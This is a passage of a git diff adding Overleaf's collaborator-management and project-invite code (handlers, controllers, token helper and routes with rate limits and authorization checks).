require('../Contacts/ContactManager') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +const TpdsProjectFlusher = require('../ThirdPartyDataStore/TpdsProjectFlusher') +const CollaboratorsGetter = require('./CollaboratorsGetter') +const Errors = require('../Errors/Errors') +const TpdsUpdateSender = require('../ThirdPartyDataStore/TpdsUpdateSender') +const EditorRealTimeController = require('../Editor/EditorRealTimeController') + +module.exports = { + userIsTokenMember: callbackify(userIsTokenMember), + removeUserFromProject: callbackify(removeUserFromProject), + removeUserFromAllProjects: callbackify(removeUserFromAllProjects), + addUserIdToProject: callbackify(addUserIdToProject), + transferProjects: callbackify(transferProjects), + promises: { + userIsTokenMember, + removeUserFromProject, + removeUserFromAllProjects, + addUserIdToProject, + transferProjects, + setCollaboratorPrivilegeLevel, + convertTrackChangesToExplicitFormat, + }, +} +// Forces null pendingReviewer_refs, readOnly_refs, and reviewer_refs to +// be empty arrays to avoid errors during $pull ops +// See https://github.com/overleaf/internal/issues/24610 +async function fixNullCollaboratorRefs(projectId) { + // Temporary cleanup for the case where pendingReviewer_refs is null + await Project.updateOne( + { _id: projectId, pendingReviewer_refs: { $type: 'null' } }, + { $set: { pendingReviewer_refs: [] } } + ).exec() + + // Temporary cleanup for the case where readOnly_refs is null + await Project.updateOne( + { _id: projectId, readOnly_refs: { $type: 'null' } }, + { $set: { readOnly_refs: [] } } + ).exec() + + // Temporary cleanup for the case where reviewer_refs is null + await Project.updateOne( + { _id: projectId, reviewer_refs: { $type: 'null' } }, + { $set: { reviewer_refs: [] } } + ).exec() +} + +async function removeUserFromProject(projectId, userId) { + try { + const project = await Project.findOne({ _id: projectId }).exec() + + await fixNullCollaboratorRefs(projectId) + + // Deal with the old type of boolean value for archived + // In order to clear it + if (typeof project.archived === 'boolean') { + let archived = ProjectHelper.calculateArchivedArray( + project, + userId, + 'ARCHIVE' + ) + + archived = archived.filter(id => id.toString() !== userId.toString()) + + await Project.updateOne( + { _id: projectId }, + { + $set: { archived }, + $pull: { + collaberator_refs: userId, + reviewer_refs: userId, + readOnly_refs: userId, + pendingEditor_refs: userId, + pendingReviewer_refs: userId, + tokenAccessReadOnly_refs: userId, + tokenAccessReadAndWrite_refs: userId, + trashed: userId, + }, + } + ) + } else { + await Project.updateOne( + { _id: projectId }, + { + $pull: { + collaberator_refs: userId, + readOnly_refs: userId, + reviewer_refs: userId, + pendingEditor_refs: userId, + pendingReviewer_refs: userId, + tokenAccessReadOnly_refs: userId, + tokenAccessReadAndWrite_refs: userId, + archived: userId, + trashed: userId, + }, + } + ) + } + } catch (err) { + throw OError.tag(err, 'problem removing user from project collaborators', { + projectId, + userId, + }) + } +} + +async function removeUserFromAllProjects(userId) { + const { readAndWrite, readOnly, tokenReadAndWrite, tokenReadOnly } = + await CollaboratorsGetter.promises.dangerouslyGetAllProjectsUserIsMemberOf( + userId, + { + _id: 1, + } + ) + const allProjects = readAndWrite + .concat(readOnly) + .concat(tokenReadAndWrite) + .concat(tokenReadOnly) + for (const project of allProjects) { + await removeUserFromProject(project._id, userId) + } +} + +async function addUserIdToProject( + projectId, + addingUserId, + userId, + privilegeLevel, + { pendingEditor, pendingReviewer } = {} +) { + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: 1, + name: 1, + collaberator_refs: 1, + readOnly_refs: 1, + reviewer_refs: 1, + track_changes: 1, + }) + let level + let existingUsers = project.collaberator_refs || [] + existingUsers = existingUsers.concat(project.readOnly_refs || []) + existingUsers = existingUsers.map(u => u.toString()) + if (existingUsers.includes(userId.toString())) { + return // User already in Project + } + if (privilegeLevel === PrivilegeLevels.READ_AND_WRITE) { + level = { collaberator_refs: userId } + logger.debug( + { privileges: 'readAndWrite', userId, projectId }, + 'adding user' + ) + } else if (privilegeLevel === PrivilegeLevels.READ_ONLY) { + level = { readOnly_refs: userId } + if (pendingEditor) { + level.pendingEditor_refs = userId + } else if (pendingReviewer) { + level.pendingReviewer_refs = userId + } + logger.debug( + { + privileges: 'readOnly', + userId, + projectId, + pendingEditor, + pendingReviewer, + }, + 'adding user' + ) + } else if (privilegeLevel === PrivilegeLevels.REVIEW) { + level = { reviewer_refs: userId } + logger.debug({ privileges: 'reviewer', userId, projectId }, 'adding user') + } else { + throw new Error(`unknown privilegeLevel: ${privilegeLevel}`) + } + + if (addingUserId) { + ContactManager.addContact(addingUserId, userId, () => {}) + } + + if (privilegeLevel === PrivilegeLevels.REVIEW) { + const trackChanges = await convertTrackChangesToExplicitFormat( + projectId, + project.track_changes + ) + trackChanges[userId] = true + + await Project.updateOne( + { _id: projectId }, + { track_changes: trackChanges, $addToSet: level } + ).exec() + + EditorRealTimeController.emitToRoom( + projectId, + 'toggle-track-changes', + trackChanges + ) + } else { + await Project.updateOne({ _id: projectId }, { $addToSet: level }).exec() + } + + // Ensure there is a dedicated folder for this "new" project. + await TpdsUpdateSender.promises.createProject({ + projectId, + projectName: project.name, + ownerId: project.owner_ref, + userId, + }) + + // Flush to TPDS in background to add files to collaborator's Dropbox + TpdsProjectFlusher.promises.flushProjectToTpds(projectId).catch(err => { + logger.error( + { err, projectId, userId }, + 'error flushing to TPDS after adding collaborator' + ) + }) +} + +async function transferProjects(fromUserId, toUserId) { + // Find all the projects this user is part of so we can flush them to TPDS + const projects = await Project.find( + { + $or: [ + { owner_ref: fromUserId }, + { collaberator_refs: fromUserId }, + { readOnly_refs: fromUserId }, + ], + }, + { _id: 1 } + ).exec() + const projectIds = projects.map(p => p._id) + logger.debug({ projectIds, fromUserId, toUserId }, 'transferring projects') + + await Project.updateMany( + { owner_ref: fromUserId }, + { $set: { owner_ref: toUserId } } + ).exec() + + await Project.updateMany( + { collaberator_refs: fromUserId }, + { + $addToSet: { collaberator_refs: toUserId }, + } + ).exec() + await Project.updateMany( + { collaberator_refs: fromUserId }, + { + $pull: { collaberator_refs: fromUserId }, + } + ).exec() + + await Project.updateMany( + { readOnly_refs: fromUserId }, + { + $addToSet: { readOnly_refs: toUserId }, + } + ).exec() + await Project.updateMany( + { readOnly_refs: fromUserId }, + { + $pull: { readOnly_refs: fromUserId }, + } + ).exec() + + await Project.updateMany( + { pendingEditor_refs: fromUserId }, + { + $addToSet: { pendingEditor_refs: toUserId }, + } + ).exec() + await Project.updateMany( + { pendingEditor_refs: fromUserId }, + { + $pull: { pendingEditor_refs: fromUserId }, + } + ).exec() + + await Project.updateMany( + { pendingReviewer_refs: fromUserId }, + { + $addToSet: { pendingReviewer_refs: toUserId }, + } + ).exec() + await Project.updateMany( + { pendingReviewer_refs: fromUserId }, + { + $pull: { pendingReviewer_refs: fromUserId }, + } + ).exec() + + // Flush in background, no need to block on this + _flushProjects(projectIds).catch(err => { + logger.err( + { err, projectIds, fromUserId, toUserId }, + 'error flushing tranferred projects to TPDS' + ) + }) +} + +async function setCollaboratorPrivilegeLevel( + projectId, + userId, + privilegeLevel, + { pendingEditor, pendingReviewer } = {} +) { + // Make sure we're only updating the project if the user is already a + // collaborator + const query = { + _id: projectId, + $or: [ + { collaberator_refs: userId }, + { readOnly_refs: userId }, + { reviewer_refs: userId }, + ], + } + let update + + await fixNullCollaboratorRefs(projectId) + + switch (privilegeLevel) { + case PrivilegeLevels.READ_AND_WRITE: { + update = { + $pull: { + readOnly_refs: userId, + pendingEditor_refs: userId, + reviewer_refs: userId, + pendingReviewer_refs: userId, + }, + $addToSet: { collaberator_refs: userId }, + } + break + } + case PrivilegeLevels.REVIEW: { + update = { + $pull: { + readOnly_refs: userId, + pendingEditor_refs: userId, + collaberator_refs: userId, + pendingReviewer_refs: userId, + }, + $addToSet: { reviewer_refs: userId }, + } + + const project = await ProjectGetter.promises.getProject(projectId, { + track_changes: true, + }) + const newTrackChangesState = await convertTrackChangesToExplicitFormat( + projectId, + project.track_changes + ) + if (newTrackChangesState[userId] !== true) { + newTrackChangesState[userId] = true + } + if (typeof project.track_changes === 'object') { + update.$set = { [`track_changes.${userId}`]: true } + } else { + update.$set = { track_changes: newTrackChangesState } + } + break + } + case PrivilegeLevels.READ_ONLY: { + update = { + $pull: { collaberator_refs: userId, reviewer_refs: userId }, + $addToSet: { readOnly_refs: userId }, + } + + if (pendingEditor) { + update.$addToSet.pendingEditor_refs = userId + } else { + update.$pull.pendingEditor_refs = userId + } + + if (pendingReviewer) { + update.$addToSet.pendingReviewer_refs = userId + } else { + update.$pull.pendingReviewer_refs = userId + } + + break + } + default: { + throw new OError(`unknown privilege level: ${privilegeLevel}`) + } + } + const mongoResponse = await Project.updateOne(query, update).exec() + if (mongoResponse.matchedCount === 0) { + throw new Errors.NotFoundError('project or collaborator not found') + } + + if (update.$set?.track_changes) { + EditorRealTimeController.emitToRoom( + projectId, + 'toggle-track-changes', + update.$set.track_changes + ) + } +} + +async function userIsTokenMember(userId, projectId) { + if (!userId) { + return false + } + try { + const project = await Project.findOne( + { + _id: projectId, + $or: [ + { tokenAccessReadOnly_refs: userId }, + { tokenAccessReadAndWrite_refs: userId }, + ], + }, + { + _id: 1, + } + ) + return project != null + } catch (err) { + throw OError.tag(err, 'problem while checking if user is token member', { + userId, + projectId, + }) + } +} + +async function _flushProjects(projectIds) { + for (const projectId of projectIds) { + await TpdsProjectFlusher.promises.flushProjectToTpds(projectId) + } +} + +async function convertTrackChangesToExplicitFormat( + projectId, + trackChangesState +) { + if (typeof trackChangesState === 'object') { + return { ...trackChangesState } + } + + if (trackChangesState === true) { + // track changes are enabled for all + const members = + await CollaboratorsGetter.promises.getMemberIdsWithPrivilegeLevels( + projectId + ) + + const newTrackChangesState = {} + for (const { id, privilegeLevel } of members) { + if ( + [ + PrivilegeLevels.OWNER, + PrivilegeLevels.READ_AND_WRITE, + PrivilegeLevels.REVIEW, + ].includes(privilegeLevel) + ) { + newTrackChangesState[id] = true + } + } + + return newTrackChangesState + } + + return {} +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsInviteController.mjs b/services/web/app/src/Features/Collaborators/CollaboratorsInviteController.mjs new file mode 100644 index 0000000..c6ffba1 --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsInviteController.mjs @@ -0,0 +1,399 @@ +import ProjectGetter from '../Project/ProjectGetter.js' +import LimitationsManager from '../Subscription/LimitationsManager.js' +import UserGetter from '../User/UserGetter.js' +import CollaboratorsGetter from './CollaboratorsGetter.js' +import CollaboratorsInviteHandler from './CollaboratorsInviteHandler.mjs' +import CollaboratorsInviteGetter from './CollaboratorsInviteGetter.js' +import logger from '@overleaf/logger' +import Settings from '@overleaf/settings' +import EmailHelper from '../Helpers/EmailHelper.js' +import EditorRealTimeController from '../Editor/EditorRealTimeController.js' +import AnalyticsManager from '../Analytics/AnalyticsManager.js' +import SessionManager from '../Authentication/SessionManager.js' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import { expressify } from '@overleaf/promise-utils' +import ProjectAuditLogHandler from '../Project/ProjectAuditLogHandler.js' +import Errors from '../Errors/Errors.js' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import PrivilegeLevels from '../Authorization/PrivilegeLevels.js' + +// This rate limiter allows a different number of requests depending on the +// number of callaborators a user is allowed. This is implemented by providing +// a number of points (P) and consuming c = floor(P / maxRequests) on each +// request. We'd like (maxRequests + 1) requests to trigger the rate limit, so +// one constrait that we have is that c * (maxRequests + 1) > P. This is +// achieved if P = M^2 where M is the largest value possible for maxRequests. +// +// In the present case, we allow 10 requests per collaborator per 30 minutes, +// with a maximum of 200 requests, so P = 200^2 = 40000. +const RATE_LIMIT_POINTS = 40000 +const rateLimiter = new RateLimiter('invite-to-project-by-user-id', { + points: RATE_LIMIT_POINTS, + duration: 60 * 30, +}) + +async function getAllInvites(req, res) { + const projectId = req.params.Project_id + logger.debug({ projectId }, 'getting all active invites for project') + const invites = + await CollaboratorsInviteGetter.promises.getAllInvites(projectId) + res.json({ invites }) +} + +async function _checkShouldInviteEmail(email) { + if (Settings.restrictInvitesToExistingAccounts === true) { + logger.debug({ email }, 'checking if user exists with this email') + const user = await UserGetter.promises.getUserByAnyEmail(email, { + _id: 1, + }) + const userExists = user?._id != null + return userExists + } else { + return true + } +} + +async function _checkRateLimit(userId) { + let collabLimit = + await LimitationsManager.promises.allowedNumberOfCollaboratorsForUser( + userId + ) + + if (collabLimit == null || collabLimit === 0) { + collabLimit = 1 + } else if (collabLimit < 0 || collabLimit > 20) { + collabLimit = 20 + } + + // Consume enough points to hit the rate limit at 10 * collabLimit + const maxRequests = 10 * collabLimit + const points = Math.floor(RATE_LIMIT_POINTS / maxRequests) + try { + await rateLimiter.consume(userId, points, { method: 'userId' }) + } catch (err) { + if (err instanceof Error) { + throw err + } else { + return false + } + } + return true +} + +async function inviteToProject(req, res) { + const projectId = req.params.Project_id + let { email, privileges } = req.body + const sendingUser = SessionManager.getSessionUser(req.session) + const sendingUserId = sendingUser._id + req.logger.addFields({ email, sendingUserId }) + + if (email === sendingUser.email) { + logger.debug( + { projectId, email, sendingUserId }, + 'cannot invite yourself to project' + ) + return res.json({ invite: null, error: 'cannot_invite_self' }) + } + + logger.debug({ projectId, email, sendingUserId }, 'inviting to project') + + let allowed = false + // can always invite read-only collaborators + if (privileges === PrivilegeLevels.READ_ONLY) { + allowed = true + } else { + allowed = await LimitationsManager.promises.canAddXEditCollaborators( + projectId, + 1 + ) + } + + if (!allowed) { + logger.debug( + { projectId, email, sendingUserId }, + 'not allowed to invite more users to project' + ) + return res.json({ invite: null }) + } + + email = EmailHelper.parseEmail(email, true) + if (email == null || email === '') { + logger.debug({ projectId, email, sendingUserId }, 'invalid email address') + return res.status(400).json({ errorReason: 'invalid_email' }) + } + + const underRateLimit = + await CollaboratorsInviteController._checkRateLimit(sendingUserId) + if (!underRateLimit) { + return res.sendStatus(429) + } + + const shouldAllowInvite = + await CollaboratorsInviteController._checkShouldInviteEmail(email) + if (!shouldAllowInvite) { + logger.debug( + { email, projectId, sendingUserId }, + 'not allowed to send an invite to this email address' + ) + return res.json({ + invite: null, + error: 'cannot_invite_non_user', + }) + } + + const invite = await CollaboratorsInviteHandler.promises.inviteToProject( + projectId, + sendingUser, + email, + privileges + ) + + ProjectAuditLogHandler.addEntryInBackground( + projectId, + 'send-invite', + sendingUserId, + req.ip, + { + inviteId: invite._id, + privileges, + } + ) + + logger.debug({ projectId, email, sendingUserId }, 'invite created') + + EditorRealTimeController.emitToRoom(projectId, 'project:membership:changed', { + invites: true, + }) + res.json({ invite }) +} +async function revokeInvite(req, res) { + const projectId = req.params.Project_id + const inviteId = req.params.invite_id + const user = SessionManager.getSessionUser(req.session) + + logger.debug({ projectId, inviteId }, 'revoking invite') + + const invite = await CollaboratorsInviteHandler.promises.revokeInvite( + projectId, + inviteId + ) + + if (invite != null) { + ProjectAuditLogHandler.addEntryInBackground( + projectId, + 'revoke-invite', + user._id, + req.ip, + { + inviteId: invite._id, + privileges: invite.privileges, + } + ) + EditorRealTimeController.emitToRoom( + projectId, + 'project:membership:changed', + { invites: true } + ) + } + + res.sendStatus(204) +} + +async function generateNewInvite(req, res) { + const projectId = req.params.Project_id + const inviteId = req.params.invite_id + const user = SessionManager.getSessionUser(req.session) + + logger.debug({ projectId, inviteId }, 'resending invite') + const sendingUser = SessionManager.getSessionUser(req.session) + const underRateLimit = await CollaboratorsInviteController._checkRateLimit( + sendingUser._id + ) + if (!underRateLimit) { + return res.sendStatus(429) + } + + const invite = await CollaboratorsInviteHandler.promises.generateNewInvite( + projectId, + sendingUser, + inviteId + ) + + EditorRealTimeController.emitToRoom(projectId, 'project:membership:changed', { + invites: true, + }) + + if (invite != null) { + ProjectAuditLogHandler.addEntryInBackground( + projectId, + 'resend-invite', + user._id, + req.ip, + { + inviteId: invite._id, + privileges: invite.privileges, + } + ) + + res.sendStatus(201) + } else { + res.sendStatus(404) + } +} + +async function viewInvite(req, res) { + const projectId = req.params.Project_id + const { token } = req.params + const _renderInvalidPage = function () { + res.status(404) + logger.debug({ projectId }, 'invite not valid, rendering not-valid page') + res.render('project/invite/not-valid', { title: 'Invalid Invite' }) + } + + // check if the user is already a member of the project + const currentUser = SessionManager.getSessionUser(req.session) + if (currentUser) { + const isMember = + await CollaboratorsGetter.promises.isUserInvitedMemberOfProject( + currentUser._id, + projectId + ) + if (isMember) { + logger.debug( + { projectId, userId: currentUser._id }, + 'user is already a member of this project, redirecting' + ) + return res.redirect(`/project/${projectId}`) + } + } + + // get the invite + const invite = await CollaboratorsInviteGetter.promises.getInviteByToken( + projectId, + token + ) + + // check if invite is gone, or otherwise non-existent + if (invite == null) { + logger.debug({ projectId }, 'no invite found for this token') + return _renderInvalidPage() + } + + // check the user who sent the invite exists + const owner = await UserGetter.promises.getUser( + { _id: invite.sendingUserId }, + { email: 1, first_name: 1, last_name: 1 } + ) + if (owner == null) { + logger.debug({ projectId }, 'no project owner found') + return _renderInvalidPage() + } + + // fetch the project name + const project = await ProjectGetter.promises.getProject(projectId, { + name: 1, + }) + if (project == null) { + logger.debug({ projectId }, 'no project found') + return _renderInvalidPage() + } + + if (!currentUser) { + req.session.sharedProjectData = { + project_name: project.name, + user_first_name: owner.first_name, + } + AuthenticationController.setRedirectInSession(req) + return res.redirect('/register') + } + + // cleanup if set for register page + delete req.session.sharedProjectData + + // finally render the invite + res.render('project/invite/show', { + invite, + token, + project, + owner, + title: 'Project Invite', + }) +} + +async function acceptInvite(req, res) { + const { Project_id: projectId, token } = req.params + const currentUser = SessionManager.getSessionUser(req.session) + logger.debug( + { projectId, userId: currentUser._id }, + 'got request to accept invite' + ) + + const invite = await CollaboratorsInviteGetter.promises.getInviteByToken( + projectId, + token + ) + + if (invite == null) { + throw new Errors.NotFoundError('no matching invite found') + } + + await ProjectAuditLogHandler.promises.addEntry( + projectId, + 'accept-invite', + currentUser._id, + req.ip, + { + inviteId: invite._id, + privileges: invite.privileges, + } + ) + + await CollaboratorsInviteHandler.promises.acceptInvite( + invite, + projectId, + currentUser + ) + + await EditorRealTimeController.emitToRoom( + projectId, + 'project:membership:changed', + { invites: true, members: true } + ) + + let editMode = 'edit' + if (invite.privileges === PrivilegeLevels.REVIEW) { + editMode = 'review' + } else if (invite.privileges === PrivilegeLevels.READ_ONLY) { + editMode = 'view' + } + AnalyticsManager.recordEventForUserInBackground( + currentUser._id, + 'project-joined', + { + projectId, + ownerId: invite.sendingUserId, // only owner can invite others + mode: editMode, + role: invite.privileges, + source: 'email-invite', + } + ) + + if (req.xhr) { + res.sendStatus(204) // Done async via project page notification + } else { + res.redirect(`/project/${projectId}`) + } +} + +const CollaboratorsInviteController = { + getAllInvites: expressify(getAllInvites), + inviteToProject: expressify(inviteToProject), + revokeInvite: expressify(revokeInvite), + generateNewInvite: expressify(generateNewInvite), + viewInvite: expressify(viewInvite), + acceptInvite: expressify(acceptInvite), + _checkShouldInviteEmail, + _checkRateLimit, +} + +export default CollaboratorsInviteController diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsInviteGetter.js b/services/web/app/src/Features/Collaborators/CollaboratorsInviteGetter.js new file mode 100644 index 0000000..e3f692e --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsInviteGetter.js @@ -0,0 +1,48 @@ +const logger = require('@overleaf/logger') +const { ProjectInvite } = require('../../models/ProjectInvite') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +const CollaboratorsInviteHelper = require('./CollaboratorsInviteHelper') + +async function getAllInvites(projectId) { + logger.debug({ projectId }, 'fetching invites for project') + const invites = await ProjectInvite.find({ projectId }) + .select('_id email privileges') + .exec() + logger.debug( + { projectId, count: invites.length }, + 'found invites for project' + ) + return invites +} + +async function getEditInviteCount(projectId) { + logger.debug({ projectId }, 'counting edit invites for project') + const count = await ProjectInvite.countDocuments({ + projectId, + privileges: { $ne: PrivilegeLevels.READ_ONLY }, + }).exec() + return count +} + +async function getInviteByToken(projectId, tokenString) { + logger.debug({ projectId }, 'fetching invite by token') + const invite = await ProjectInvite.findOne({ + projectId, + tokenHmac: CollaboratorsInviteHelper.hashInviteToken(tokenString), + }).exec() + + if (invite == null) { + logger.err({ projectId }, 'no invite found') + return null + } + + return invite +} + +module.exports = { + promises: { + getAllInvites, + getEditInviteCount, + getInviteByToken, + }, +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.mjs b/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.mjs new file mode 100644 index 0000000..02db4de --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.mjs @@ -0,0 +1,234 @@ +import { callbackify } from 'node:util' +import { ProjectInvite } from '../../models/ProjectInvite.js' +import logger from '@overleaf/logger' +import CollaboratorsEmailHandler from './CollaboratorsEmailHandler.mjs' +import CollaboratorsHandler from './CollaboratorsHandler.js' +import CollaboratorsInviteGetter from './CollaboratorsInviteGetter.js' +import CollaboratorsInviteHelper from './CollaboratorsInviteHelper.js' +import UserGetter from '../User/UserGetter.js' +import ProjectGetter from '../Project/ProjectGetter.js' +import NotificationsBuilder from '../Notifications/NotificationsBuilder.js' +import PrivilegeLevels from '../Authorization/PrivilegeLevels.js' +import LimitationsManager from '../Subscription/LimitationsManager.js' +import ProjectAuditLogHandler from '../Project/ProjectAuditLogHandler.js' +import _ from 'lodash' + +const CollaboratorsInviteHandler = { + async _trySendInviteNotification(projectId, sendingUser, invite) { + const { email } = invite + const existingUser = await UserGetter.promises.getUserByAnyEmail(email, { + _id: 1, + }) + if (existingUser == null) { + logger.debug({ projectId, email }, 'no existing user found, returning') + return null + } + const project = await ProjectGetter.promises.getProject(projectId, { + _id: 1, + name: 1, + }) + if (project == null) { + logger.debug( + { projectId }, + 'no project found while sending notification, returning' + ) + return null + } + await NotificationsBuilder.promises + .projectInvite(invite, project, sendingUser, existingUser) + .create() + }, + + async _tryCancelInviteNotification(inviteId) { + return await NotificationsBuilder.promises + .projectInvite({ _id: inviteId }, null, null, null) + .read() + }, + + async _sendMessages(projectId, sendingUser, invite) { + const { email } = invite + logger.debug( + { projectId, email, inviteId: invite._id }, + 'sending notification and email for invite' + ) + const notificationJob = + CollaboratorsInviteHandler._trySendInviteNotification( + projectId, + sendingUser, + invite + ).catch(err => { + logger.err( + { err, projectId, email }, + 'error sending notification for invite' + ) + }) + CollaboratorsEmailHandler.promises + .notifyUserOfProjectInvite(projectId, invite.email, invite, sendingUser) + .catch(err => { + logger.err({ err, projectId, email }, 'error sending email for invite') + }) + await notificationJob + }, + + async inviteToProject(projectId, sendingUser, email, privileges) { + logger.debug( + { projectId, sendingUserId: sendingUser._id, email, privileges }, + 'adding invite' + ) + const token = CollaboratorsInviteHelper.generateToken() + const tokenHmac = CollaboratorsInviteHelper.hashInviteToken(token) + let invite = new ProjectInvite({ + email, + tokenHmac, + sendingUserId: sendingUser._id, + projectId, + privileges, + }) + invite = await invite.save() + invite = invite.toObject() + + // Send notification and email + await CollaboratorsInviteHandler._sendMessages(projectId, sendingUser, { + ...invite, + token, + }) + + return _.pick(invite, ['_id', 'email', 'privileges']) + }, + + async revokeInviteForUser(projectId, targetEmails) { + logger.debug({ projectId }, 'getting all active invites for project') + const invites = + await CollaboratorsInviteGetter.promises.getAllInvites(projectId) + const matchingInvite = invites.find(invite => + targetEmails.some(emailData => emailData.email === invite.email) + ) + if (matchingInvite) { + await CollaboratorsInviteHandler.revokeInvite( + projectId, + matchingInvite._id + ) + } + }, + + async revokeInvite(projectId, inviteId) { + logger.debug({ projectId, inviteId }, 'removing invite') + const invite = await ProjectInvite.findOneAndDelete({ + projectId, + _id: inviteId, + }).exec() + CollaboratorsInviteHandler._tryCancelInviteNotification(inviteId).catch( + err => { + logger.err( + { err, projectId, inviteId }, + 'failed to cancel invite notification' + ) + } + ) + return invite + }, + + async generateNewInvite(projectId, sendingUser, inviteId) { + logger.debug({ projectId, inviteId }, 'generating new invite email') + const invite = await this.revokeInvite(projectId, inviteId) + + if (invite == null) { + logger.warn( + { projectId, inviteId }, + 'no invite found, nothing to generate' + ) + return null + } + + return await this.inviteToProject( + projectId, + sendingUser, + invite.email, + invite.privileges + ) + }, + + async acceptInvite(invite, projectId, user) { + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: 1, + }) + + let privilegeLevel = invite.privileges + const opts = {} + if ( + [PrivilegeLevels.READ_AND_WRITE, PrivilegeLevels.REVIEW].includes( + invite.privileges + ) + ) { + const allowed = + await LimitationsManager.promises.canAcceptEditCollaboratorInvite( + project._id + ) + if (!allowed) { + privilegeLevel = PrivilegeLevels.READ_ONLY + if (invite.privileges === PrivilegeLevels.READ_AND_WRITE) { + opts.pendingEditor = true + } else if (invite.privileges === PrivilegeLevels.REVIEW) { + opts.pendingReviewer = true + } + + logger.debug( + { projectId, userId: user._id, privileges: invite.privileges }, + 'no collaborator slots available, user added as read only (pending editor)' + ) + await ProjectAuditLogHandler.promises.addEntry( + projectId, + 'editor-moved-to-pending', // controller already logged accept-invite + null, + null, + { + userId: user._id.toString(), + role: + invite.privileges === PrivilegeLevels.REVIEW + ? 'reviewer' + : 'editor', + } + ) + } + } + + await CollaboratorsHandler.promises.addUserIdToProject( + projectId, + invite.sendingUserId, + user._id, + privilegeLevel, + opts + ) + + // Remove invite + const inviteId = invite._id + logger.debug({ projectId, inviteId }, 'removing invite') + await ProjectInvite.deleteOne({ _id: inviteId }).exec() + CollaboratorsInviteHandler._tryCancelInviteNotification(inviteId).catch( + err => { + logger.error( + { err, projectId, inviteId }, + 'failed to cancel invite notification' + ) + } + ) + }, +} + +export default { + promises: CollaboratorsInviteHandler, + inviteToProject: callbackify(CollaboratorsInviteHandler.inviteToProject), + revokeInviteForUser: callbackify( + CollaboratorsInviteHandler.revokeInviteForUser + ), + revokeInvite: callbackify(CollaboratorsInviteHandler.revokeInvite), + generateNewInvite: callbackify(CollaboratorsInviteHandler.generateNewInvite), + acceptInvite: callbackify(CollaboratorsInviteHandler.acceptInvite), + _trySendInviteNotification: callbackify( + CollaboratorsInviteHandler._trySendInviteNotification + ), + _tryCancelInviteNotification: callbackify( + CollaboratorsInviteHandler._tryCancelInviteNotification + ), + _sendMessages: callbackify(CollaboratorsInviteHandler._sendMessages), +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsInviteHelper.js b/services/web/app/src/Features/Collaborators/CollaboratorsInviteHelper.js new file mode 100644 index 0000000..305f93e --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsInviteHelper.js @@ -0,0 +1,17 @@ +const Crypto = require('crypto') + +function generateToken() { + const buffer = Crypto.randomBytes(24) + return buffer.toString('hex') +} + +function hashInviteToken(token) { + return Crypto.createHmac('sha256', 'overleaf-token-invite') + .update(token) + .digest('hex') +} + +module.exports = { + generateToken, + hashInviteToken, +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsRouter.mjs b/services/web/app/src/Features/Collaborators/CollaboratorsRouter.mjs new file mode 100644 index 0000000..63a88c1 --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsRouter.mjs @@ -0,0 +1,175 @@ +import CollaboratorsController from './CollaboratorsController.mjs' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import AuthorizationMiddleware from '../Authorization/AuthorizationMiddleware.js' +import PrivilegeLevels from '../Authorization/PrivilegeLevels.js' +import CollaboratorsInviteController from './CollaboratorsInviteController.mjs' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' +import CaptchaMiddleware from '../Captcha/CaptchaMiddleware.js' +import AnalyticsRegistrationSourceMiddleware from '../Analytics/AnalyticsRegistrationSourceMiddleware.js' +import { Joi, validate } from '../../infrastructure/Validation.js' + +const rateLimiters = { + inviteToProjectByProjectId: new RateLimiter( + 'invite-to-project-by-project-id', + { points: 100, duration: 60 * 10 } + ), + inviteToProjectByIp: new RateLimiter('invite-to-project-by-ip', { + points: 100, + duration: 60 * 10, + }), + resendInvite: new RateLimiter('resend-invite', { + points: 200, + duration: 60 * 10, + }), + getProjectTokens: new RateLimiter('get-project-tokens', { + points: 200, + duration: 60 * 10, + }), + viewProjectInvite: new RateLimiter('view-project-invite', { + points: 20, + duration: 60, + }), +} + +export default { + apply(webRouter) { + webRouter.post( + '/project/:Project_id/leave', + AuthenticationController.requireLogin(), + CollaboratorsController.removeSelfFromProject + ) + + webRouter.put( + '/project/:Project_id/users/:user_id', + AuthenticationController.requireLogin(), + validate({ + params: Joi.object({ + Project_id: Joi.objectId(), + user_id: Joi.objectId(), + }), + body: Joi.object({ + privilegeLevel: Joi.string() + .valid( + PrivilegeLevels.READ_ONLY, + PrivilegeLevels.READ_AND_WRITE, + PrivilegeLevels.REVIEW + ) + .required(), + }), + }), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsController.setCollaboratorInfo + ) + + webRouter.delete( + '/project/:Project_id/users/:user_id', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsController.removeUserFromProject + ) + + webRouter.get( + '/project/:Project_id/members', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + CollaboratorsController.getAllMembers + ) + + webRouter.post( + '/project/:Project_id/transfer-ownership', + AuthenticationController.requireLogin(), + validate({ + params: Joi.object({ + Project_id: Joi.objectId(), + }), + body: Joi.object({ + user_id: Joi.objectId(), + }), + }), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsController.transferOwnership + ) + + // invites + webRouter.post( + '/project/:Project_id/invite', + RateLimiterMiddleware.rateLimit(rateLimiters.inviteToProjectByProjectId, { + params: ['Project_id'], + }), + RateLimiterMiddleware.rateLimit(rateLimiters.inviteToProjectByIp, { + ipOnly: true, + }), + CaptchaMiddleware.validateCaptcha('invite'), + AuthenticationController.requireLogin(), + 